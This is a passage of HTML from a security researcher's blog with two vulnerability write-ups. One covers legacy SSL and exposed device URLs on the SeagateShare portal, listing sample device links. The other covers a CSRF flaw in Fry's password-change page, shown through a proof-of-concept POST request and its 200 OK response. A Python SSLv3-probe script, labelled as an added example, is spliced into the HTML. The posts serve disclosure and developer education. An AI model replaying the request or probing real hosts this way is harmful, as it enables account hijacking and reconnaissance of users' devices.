<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="345" src="https://lh3.googleusercontent.com/_gQ1iZ0jhk3kEcusRwJkQ9jq3QdrtqhKxvECzJMGftIkHJkPv3zO_5pC3dpfK_uvC2a7SFfCTI7OZOXGIPKNZ0N5P7hYy62Sj_T2xgVooC68VUgi3GYWgBclwW3WuYBh8SIQx2mf" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Statistical Vulnerability Data </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">It has been discovered that the embedded server still supports SSLv2 / SSLv3, whereas </span><br />
<a href="http://seagateshare.com/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">seagateshare.com</span></a><span style="background-color: transparent; color: #222222; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span><span style="color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">supports SSLv3. We have looked into 50,000+ devices running on </span><br />
<span style="color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">unique IPs that have SSLv2 / SSLv3 enabled. Additionally, during standard tests, we </span><br />
<span style="color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">collected 17000+ URLs </span><span style="color: #222222; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">of </span><a href="http://seagateshare.com/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">seagateshare.com</span></a><span style="color: #222222; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;"> with unique device_ids. </span><br />
<span style="color: #222222; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><br /></span>
<span style="color: #222222; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">A few examples are shown below:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none; width: 468pt;"><colgroup><col width="*"></col></colgroup><tbody>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Location: </span><a href="https://www.seagateshare.com/?hipname=zrrocket" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://www.seagateshare.com/?hipname=zrrocket</span></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Location: </span><a href="https://www.seagateshare.com/?hipname=zseagate" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://www.seagateshare.com/?hipname=zseagate</span></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Location: </span><a href="https://www.seagateshare.com/?hipname=zurcruz" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://www.seagateshare.com/?hipname=zurcruz</span></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Location: </span><a href="https://www.seagateshare.com/?hipname=zurd2071" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://www.seagateshare.com/?hipname=zurd2071</span></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Location: </span><a href="https://www.seagateshare.com/?hipname=zx-goflex" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://www.seagateshare.com/?hipname=zx-goflex</span></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Location: </span><a href="https://www.seagateshare.com/?hipname=zxcvdrive" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://www.seagateshare.com/?hipname=zxcvdrive</span></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Location: </span><a href="https://www.seagateshare.com/?hipname=zxseagatedrive" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://www.seagateshare.com/?hipname=zxseagatedrive</span></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Location: </span><a href="https://www.seagateshare.com/?hipname=zygmanbackup" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://www.seagateshare.com/?hipname=zygmanbackup</span></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Location: </span><a href="https://www.seagateshare.com/?hipname=zyybakcup" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://www.seagateshare.com/?hipname=zyybakcup</span></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Location: </span><a href="https://www.seagateshare.com/?hipname=zzstore" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://www.seagateshare.com/?hipname=zzstore</span></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">………………….</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">………………….</span></div>
</td></tr>
</tbody></table>
</div>
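The legacy-SSL exposure counted above is something a defender can verify per host. As an added example (not code from the original post, nor from the Seagate firmware), the Python script below hand-builds an SSLv3 ClientHello, since modern Python ssl builds cannot speak SSLv3, and classifies the first record the server returns; the cipher-suite list and the constructed ServerHello/alert samples are assumptions, and SSLv2, which uses a different record format, is not covered.

```python
"""Added example: probe a server for SSLv3 support with a hand-built ClientHello."""
import os
import socket
import struct

SSLV3 = (3, 0)
CONTENT_HANDSHAKE, CONTENT_ALERT = 22, 21
HS_CLIENT_HELLO, HS_SERVER_HELLO = 1, 2
# Assumption: a few RSA suites that any SSLv3-era stack recognises (RFC 6101 identifiers).
LEGACY_SUITES = [0x000A, 0x002F, 0x0035, 0x0004, 0x0005]


def build_client_hello(version=SSLV3, suites=LEGACY_SUITES):
    """Return one SSL record carrying a ClientHello that offers only `version`."""
    major, minor = version
    body = struct.pack("!BB", major, minor)            # client_version
    body += os.urandom(32)                               # random
    body += b"\x00"                                      # session_id length 0
    body += struct.pack("!H", 2 * len(suites))           # cipher_suites length in bytes
    body += b"".join(struct.pack("!H", s) for s in suites)
    body += b"\x01\x00"                                  # compression_methods: null only
    handshake = bytes([HS_CLIENT_HELLO]) + len(body).to_bytes(3, "big") + body
    return struct.pack("!BBBH", CONTENT_HANDSHAKE, major, minor, len(handshake)) + handshake


def classify_response(data):
    """Classify the first record a server sent back after the SSLv3 ClientHello:
    'accepted' (SSLv3 still negotiated), 'refused' (alert), 'other-version' or 'unknown'."""
    if len(data) < 5:
        return "unknown"
    ctype, _, _, length = struct.unpack("!BBBH", data[:5])
    payload = data[5:5 + length]
    if ctype == CONTENT_ALERT:
        return "refused"                       # e.g. handshake_failure / protocol_version
    if ctype == CONTENT_HANDSHAKE and len(payload) >= 6 and payload[0] == HS_SERVER_HELLO:
        # ServerHello layout: type(1) length(3) server_version(2) random(32) ...
        if (payload[4], payload[5]) == SSLV3:
            return "accepted"
        return "other-version"                 # server replied with a version it was not offered
    return "unknown"


def probe(host, port=443, timeout=5.0):
    """Live check against a server (not exercised by the offline samples below)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_client_hello())
        return classify_response(sock.recv(4096))


# Constructed sample responses for offline use (not captured from any real device).
def make_server_hello(version):
    major, minor = version
    body = struct.pack("!BB", major, minor) + b"\x11" * 32 + b"\x00" + b"\x00\x2f" + b"\x00"
    handshake = bytes([HS_SERVER_HELLO]) + len(body).to_bytes(3, "big") + body
    return struct.pack("!BBBH", CONTENT_HANDSHAKE, major, minor, len(handshake)) + handshake


SAMPLE_HANDSHAKE_FAILURE = b"\x15\x03\x00\x00\x02\x02\x28"   # fatal handshake_failure alert


if __name__ == "__main__":
    print(classify_response(make_server_hello(SSLV3)))          # accepted
    print(classify_response(SAMPLE_HANDSHAKE_FAILURE))          # refused
```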
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Responsible Disclosure</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">As a part of the responsible disclosure process, both vulnerabilities were reported to the Seagate security </span><br />
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">team, which gave the following responses:</span><br />
<span style="font-family: "cambria"; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre;"><br /></span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li><span style="font-family: "times" , "times new roman" , serif;"><span style="font-weight: 700; vertical-align: baseline; white-space: pre;">Vulnerability 1:</span><i><span style="vertical-align: baseline; white-space: pre;"> </span><span style="background-color: white; color: #222222; vertical-align: baseline; white-space: pre;">Thank you for your communication and responsible disclosure on
vulnerability </span></i><i><span style="background-color: white; color: #222222; vertical-align: baseline; white-space: pre;">details </span>in SeagateShare Portal. We have carefully evaluated the matter <br />and do not presently have plans for active remediation measures. Thank you for your <br />time and help in bringing this vulnerability to our attention. We really appreciate your <br />efforts and would like to encourage you in sharing any new vulnerabilities that are <br />related to our products and or services.</i></span></li>
<li><span style="font-family: "times" , "times new roman" , serif;"><span style="background-color: white; color: #222222; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Vulnerability 2:</span><span style="background-color: white; color: #222222; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: white; color: #222222; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">XSS issue has been fixed and deployed. </span></span></li>
</ul>
<div class="blogger-post-footer">[0kn0ck's Blog]</div>
Aditya K Sood, 2017-10-04: Case Study: Frys Electronics Web Portal - How Exactly *Not To Design* Password Change Component !<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyx1hW9SDy0yaRRkVJAg69llP6EDr6QRFbgz_c3ltRkc1sfPD7IlzXR1URP56q0OW5YiwkrBzY839aKXn_f-QdHkWOU9Qf1KgDbK1rAI2DJWtR8qJajH5E1Cpexh2pHj-8Nu-g3A/s1600/shutterstock_162087113.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="667" data-original-width="1000" height="424" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyx1hW9SDy0yaRRkVJAg69llP6EDr6QRFbgz_c3ltRkc1sfPD7IlzXR1URP56q0OW5YiwkrBzY839aKXn_f-QdHkWOU9Qf1KgDbK1rAI2DJWtR8qJajH5E1Cpexh2pHj-8Nu-g3A/s640/shutterstock_162087113.jpg" width="640" /></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<b><span style="font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">NOTE: </span><span style="font-family: "cambria"; font-size: 14.666666984558105px; white-space: pre-wrap;">The issue highlighted in this post is for educational purposes only. </span></b></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">Last weekend some electronic gadgets were ordered from the Fry’s electronic store at (</span><a href="https://shop3.frys.com//wf?a=SIGN_IN,w=CHECKOUT=1" style="text-decoration: none;"><span style="color: #1155cc; font-family: "cambria"; font-size: 11pt; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://shop3.frys.com//wf?a=SIGN_IN,w=CHECKOUT=1</span></a><span style="font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">). An account was created and after interacting with the web application for 10 minutes, a number of security issues were identified in the Fry's online portal due to insecure design and coding practices. The idea behind this post is to educate application developers on how to design secure components. It is just something I came across and decided to share.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "cambria"; font-size: 11pt; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "cambria"; font-size: 11pt; white-space: pre-wrap;">In this post, the insecure design of the "Password Change Component" is presented. Users should take the highlighted issue into consideration while accessing the online web portal.</span></div>
<b style="font-weight: normal;"><br /></b><span style="font-family: "cambria"; font-size: 11pt; font-weight: 700; white-space: pre-wrap;">Insecure Design - Password Change Component</span><br />
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">It has been noticed that the "Password Change Component" used by Fry's online portal is designed insecurely. A secure design practice requires that the application component ask the user for the “old password” before the new password is supplied and verified. The application needs this additional password verification to determine whether the HTTP request was issued by the legitimate user. Requiring and validating the “old password” improves the design and robustness of the system. Further, the component does not even enforce complex password requirements. For example: (1) the last used password can be set again as the new password; (2) the minimum password length enforced is 6 characters. Many other password complexity requirements are not met either.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="217" src="https://lh3.googleusercontent.com/ryk13SFBcEaBMuzEKHhGDDHZbCJ1Q_iXhwDAMAxjPwzn-JSNnH9lPyFWGO8lB_GcAbPK_MDVpYntT9P37AUw9y_3phClEDlBXNPzZ0n29ekuIh5TYsASn1Y2if9v-0AYPNcRul9z" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624" /></span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-family: "cambria"; font-size: 11pt; font-style: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The issue does not end here. The flaw highlighted above is a basic design fallacy. <u><span style="color: red;">Let's see how multiple vulnerabilities can be chained together. </span></u></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Cross-site Request Forgery - Password Change Component</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The password change component (mod_exist_password.php) is vulnerable to Cross-site Request Forgery (CSRF) attack. Let's look into a number of design checks:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
</div>
<ol>
<li><span style="font-family: "cambria"; font-size: 11pt; white-space: pre-wrap;">The application does not implement origin verification checks, either via unique tokens or via the "Origin" header. As a result, HTTP POST requests are accepted by the application without any token verification and validation.</span></li>
<li><span style="font-family: "cambria"; font-size: 11pt; white-space: pre-wrap;">The password change component does not explicitly enforce the verification of “old password”.</span></li>
<li><span style="font-family: "cambria"; font-size: 11pt; white-space: pre-wrap;">The application does not even perform a basic "HTTP Referer" verification check on the server side.</span></li>
</ol>
<br />
<span style="font-family: "cambria"; font-size: 11pt; white-space: pre-wrap;">It means an attacker can easily author a CSRF exploit to change the password on the fly, which ultimately results in account hijacking. </span><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Let's validate this.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The HTTP POST request below is taken from the CSRF exploit drafted as a Proof-of-Concept (PoC). It can be seen that the HTTP POST request does not carry any token, either in the request headers or in the body. </span><span style="font-family: "cambria"; font-size: 11pt; white-space: pre-wrap;">In addition, the “Referer” header has been removed from the HTTP request. </span><span style="font-family: "cambria"; font-size: 11pt; white-space: pre-wrap;">In general, “Referer” validation on the server side is treated as a defense against CSRF attacks; in this case, no "Referer" validation is performed either. </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none; width: 468pt;"><colgroup><col width="*"></col></colgroup><tbody>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">POST /wf HTTP/1.1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Host: shop3.frys.com</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Accept-Language: en-US,en;q=0.5</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Content-Type: application/x-www-form-urlencoded</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Content-Length: 169</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Cookie: ID_KOT=987123654; J1_USER_ID=[Removed]; BTgroup=B; FSERVERID=s107</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Connection: close</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Upgrade-Insecure-Requests: 1</span></div>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">r=misc,c=new_password=[Truncated]&r=misc,c=new_password_again=[Truncated]&a=MODIFY_PASSWORD,w=ACCTMAINT=&button.x=21&button.y=9</span></div>
<br />
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">HTTP/1.1 200 OK</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Date: </span><span style="font-family: "cambria"; font-size: 12px; white-space: pre-wrap;"> [Truncated]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Server: Apache</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Cache-Control: max-age=0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Expires: [Truncated]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Vary: Accept-Encoding</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Connection: close</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Content-Type: text/html;charset=ISO-8859-1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Via: 1.1 sjc1-10</span></div>
